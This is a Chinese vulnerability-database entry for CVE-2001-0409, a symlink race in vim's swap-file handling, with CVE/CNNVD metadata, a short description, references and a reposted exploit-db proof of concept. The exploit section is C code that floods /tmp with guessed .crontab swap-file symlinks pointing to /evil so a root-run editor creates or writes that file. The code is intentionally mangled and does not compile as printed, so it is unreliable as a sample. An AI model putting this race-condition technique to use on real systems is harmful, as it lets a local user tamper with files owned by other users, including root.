vim(也称为gvim)漏洞

vim(也称为gvim)漏洞

漏洞ID 1106187 漏洞类型 未知
发布时间 2001-01-26 更新时间 2005-05-02
图片[1]-vim(也称为gvim)漏洞-安全小百科CVE编号 CVE-2001-0409
图片[2]-vim(也称为gvim)漏洞-安全小百科CNNVD-ID CNNVD-200106-102
漏洞平台 Linux CVSS评分 2.1
|漏洞来源
https://www.exploit-db.com/exploits/20967
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200106-102
|漏洞详情
vim(也称为gvim)存在漏洞。在受害者编辑全域可写目录文件时,本地用户可以借助对备份和是swap文件的符号链接修改正被编辑的文件。
|漏洞EXP
/*
source: http://www.securityfocus.com/bid/2927/info

Vim is an enhanced version of the popular text editor vi.

A race condition vulnerability exists in the swap file mechanism used by the 'vim' program. The error occurs when a swap file name for a file being opened is symbolically linked to a non-existent file.

By conjecturing the name of a file to be edited by another user, it may be possible for a local user to create a malicious symbolic link to a non-existent file. This could cause the new target file to be created with the permissions of the user running vim. 
*/

/*******************************************************************
             Crontab tmp file race condition

   http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=37771

   Apparently this is fixed. Wonder why it still works. 
      -- zen-parse

                     Local exploit

   Quick and dirty exploit for crontab insecure tmp files
   Redhat 7.0 - kept up2date with up2date
   Checked Tue Jun 26 00:15:32 NZST 2001
   -rw-------    1 root     root         4096 Jun 26 00:15 evil

   Requires root to execute crontab -e while the program is
   running.

   Not really likely to be too big of a problem, I hope.

   Could possibly be useful with the (still unpatched) 
   makewhatis.cron bug.

/*******************************************************************
 #define SAFER [1000]
/*******************************************************************/
int shake(int script kiddy)
{
 int f;
 char r SAFER;
 int w;

 f=fopen("/proc/loadavg","r"); 
 fscanf(f,"%*s %*s %*s %*s %s",r);
 fclose(f);
 w=atoi(r);
 return w;
}

main(int argc,char *argv[])
{
 int p;
 char v SAFER;
 sprintf(v,"/tmp/.crontab.%d.swp",shake());
 symlink("/evil",v);
 while(access("/evil",0))
 {
  for(p=-30;p<0;p++)
  {
   sprintf(v,"/tmp/.crontab.%d.swp",shake()-p);
   symlink("/evil",v);
  }
  sprintf(v,"/tmp/.crontab.%d.swp",shake()-p);
  unlink(v);
 }
 for(p=-100;p<0;p++)
 {
  sprintf(v,"/tmp/.crontab.%d.swp",shake()-p);
  unlink(v);
 }
}

 /*****************************************************************
 **   ***   *       **       *********      ***********************
 **    *    *   **   ******   *******   **   **********************
 **         *   **   **      ********   *******   ***      ********
 **   * *   *       *******   *******   ******  *  *  *  *  *******
 **   ***   *   ***********   **   **   **   *  *  *  *  *  *******
 **   ***   *   ******       ***   ***      ***   **  ****  *******
 *****************************************************************/
         //   
        //  xxxx   xxx    xxx   x   x
       //  xx     x   x  x      x   x
      //   xx     x   x   xxx   x   x
     //    xx     x   x      x   x x  
    //      xxxx   xxx    xxx     x
|参考资料

来源:CALDERA
名称:CSSA-2001-014.0
链接:http://www.calderasystems.com/support/security/advisories/CSSA-2001-014.0.txt
来源:XF
名称:vim-tmp-symlink(6628)
链接:http://xforce.iss.net/static/6628.php
来源:SUSE
名称:SuSE-SA:2001:12
链接:http://www.novell.com/linux/security/advisories/2001_012_vim.html

相关推荐: Check Point Firewall漏洞

Check Point Firewall漏洞 漏洞ID 1207364 漏洞类型 未知 发布时间 1998-05-11 更新时间 1998-05-11 CVE编号 CVE-1999-1204 CNNVD-ID CNNVD-199805-009 漏洞平台 N/A…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享